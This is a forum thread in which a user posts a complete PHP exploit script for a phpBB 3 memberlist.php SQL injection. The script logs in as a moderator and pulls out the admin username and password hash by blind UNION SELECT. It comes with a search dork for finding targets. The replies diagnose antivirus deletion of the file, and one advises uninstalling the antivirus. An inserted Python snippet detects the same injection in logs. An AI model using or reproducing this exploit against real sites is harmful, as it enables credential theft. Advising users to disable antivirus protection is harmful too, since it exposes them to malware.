shakur20 Posted June 25, 2008

Hi. I have a small problem. I took an exploit from milw0rm whose code goes roughly like this:

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -u[number]: specify a user id other than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    {$result.=" .";}
    else
    {$result.=" ".$string[$i];}
    if (strlen(dechex(ord($string[$i])))==2)
    {$exa.=" ".dechex(ord($string[$i]));}
    else
    {$exa.=" 0".dechex(ord($string[$i]));}
    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
  return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='')
  {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock)
    {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else
  {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c)
    {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock)
    {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='')
  {
    $html='';
    while (!feof($ock))
    {
      $html.=fgets($ock);
    }
  }
  else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
  $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
  $discl=1;
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
  $temp2=explode(" ",$temp[$i]);
  $cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
  //echo $html."\n";//debug
  //die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";

if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
  $temp=explode("posts",$html);
  $temp2=explode(" ",$temp[0]);
  $prefix=strtoupper($temp2[count($temp2)-1]);
  echo "prefix -> ".$prefix."\n";
  sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));

$j=1;
$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria"))
  {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;
$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria"))
  {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}

echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";

function is_hash($hash)
{
  if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
  else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

The problem is that I can't save it as nume_exploit.pl because it simply disappears 1 ms after saving. What can I do?
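A defender-side example, added here and not part of the thread or of rgod's script: it flags the character-by-character probing of the memberlist.php ip search parameter that the script above performs, by decoding the POST body and checking whether the ip value is still a plain (optionally wildcarded) address. The record layout (client, request path, URL-encoded body), the sample records and the function names are assumptions, constructed to mirror the script's request shape.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

def _probe(column, pos, ch):
    # Same shape as the script's $sql string above (before strtoupper/urlencode);
    # used only to build the constructed sample records below.
    return ("1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(%s,%d,1))=%d),2,-1) "
            "FROM PHPBB_USERS WHERE USER_ID=2 UNION SELECT POSTER_ID "
            "FROM PHPBB_POSTS WHERE POSTER_IP IN ('1.1.1.999") % (column, pos, ch)

SEARCH_PATH = "/phpbb3/memberlist.php?mode=searchuser&ip=%5C%27"

# Constructed records (client, request path, URL-encoded POST body), the shape
# a WAF or mod_security audit log would keep. Two are blind-injection probes
# for positions 1 and 2 of the hash, one is an ordinary wildcard IP search.
SAMPLE_LOG = [
    ("10.0.0.5", SEARCH_PATH, urlencode(
        {"username": "", "ip": _probe("USER_PASSWORD", 1, 48).upper(), "submit": "Search"})),
    ("10.0.0.5", SEARCH_PATH, urlencode(
        {"username": "", "ip": _probe("USER_PASSWORD", 2, 97).upper(), "submit": "Search"})),
    ("10.0.0.9", "/phpbb3/memberlist.php?mode=searchuser", urlencode(
        {"username": "", "ip": "192.168.1.%", "submit": "Search"})),
]

SQLI_TOKENS = re.compile(r"union\s+select|substring\s*\(|ascii\s*\(", re.I)
LEGIT_IP_SEARCH = re.compile(r"^[0-9.%]{1,15}$")   # dotted quad, % wildcard allowed
POS_RE = re.compile(r"substring\s*\(\s*(\w+)\s*,\s*(\d+)\s*,\s*1\s*\)", re.I)

def inspect_request(client, path, body):
    """Return a finding for one memberlist.php search request, or None."""
    if "memberlist.php" not in path:
        return None
    # parse_qs percent-decodes and turns '+' back into spaces, undoing the
    # urlencode(strtoupper($sql)) step; matching is case-insensitive anyway.
    ip = parse_qs(body).get("ip", [""])[0]
    if LEGIT_IP_SEARCH.match(ip):
        return None
    if not (SQLI_TOKENS.search(ip) or "'" in ip):
        return None
    m = POS_RE.search(ip)
    return {"client": client,
            "column": m.group(1).lower() if m else None,
            "position": int(m.group(2)) if m else None}

def scan(records):
    """Group findings by client: a walk over positions 1, 2, 3 ... with one
    request per candidate byte is the signature of the extraction loop."""
    hits = defaultdict(list)
    for client, path, body in records:
        finding = inspect_request(client, path, body)
        if finding:
            hits[client].append(finding)
    return dict(hits)
```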
SirGod Posted June 25, 2008

First of all, it's not a PHPBB 3 exploit. It's for Woltlab Burning Board 2.X. Save it as exploit.pl, move it to c:/perl/, open CMD and type:
cd\
cd perl
perl exploit.pl
shakur20 (Author) Posted June 25, 2008

Well, when I try to save it as exploit.pl in c:\perl, the exploit.pl file disappears after 1ms, it simply doesn't show up in the folder!!!
shinnok Posted June 25, 2008

Check whether your antivirus is eating it. Look in its logs if you have an antivirus.
shakur20 (Author) Posted June 25, 2008

cool!!! nod32 sucks :| thx, close and delete please.
moubik Posted June 25, 2008

Learn programming..
CODEX Posted June 25, 2008

Yep, it's the antivirus! I get the same thing, and I stop the antivirus when needed.
SirGod Posted June 26, 2008

Sorry, my mistake, I didn't look at the exploit to see the <?php, I looked at your exploit.pl.
puskin Posted July 13, 2008

You guys don't know how to read..:
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
excess Posted July 13, 2008

Uninstall the antivirus, restart the computer and you'll be able to save it. If you like playing with exploits so much, drop the damn AVs.